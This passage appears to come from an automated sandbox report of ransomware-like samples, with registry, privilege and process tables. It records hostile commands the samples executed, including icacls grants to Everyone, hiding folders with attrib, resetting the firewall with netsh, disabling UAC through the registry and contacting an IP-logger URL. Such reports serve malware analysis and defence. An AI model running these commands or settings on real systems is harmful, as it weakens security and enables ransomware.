| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\NOTEPAD.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\7.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\6.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\2024.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\7.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: 33 | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\PROGRA~3\system.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-NNBEH.tmp\tuc5.tmp | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
"4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe
"bot.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DFEVA.tmp\ska2pwej.aeh.tmp" /SL5="$3019C,4511977,830464,C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9888.tmp\9889.tmp\988A.bat C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe
"ska2pwej.aeh.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/2bB2s6
C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe"
C:\Users\Admin\Desktop\1.exe
"C:\Users\Admin\Desktop\1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe
"RIP_YOUR_PC_LOL.exe"
C:\Windows\SysWOW64\netsh.exe
C:\Windows\system32\netsh.exe advfirewall reset
C:\Users\Admin\Desktop\10.exe
"C:\Users\Admin\Desktop\10.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe
"x2s443bc.cs1.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c 107481704838965.bat
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1548 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-URSJ6.tmp\x2s443bc.cs1.tmp" /SL5="$4017A,15784509,779776,C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe"
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2.doc"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe
taskdl.exe
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe"
C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\TEMPEX~1.EXE"
C:\Windows\svchost.com
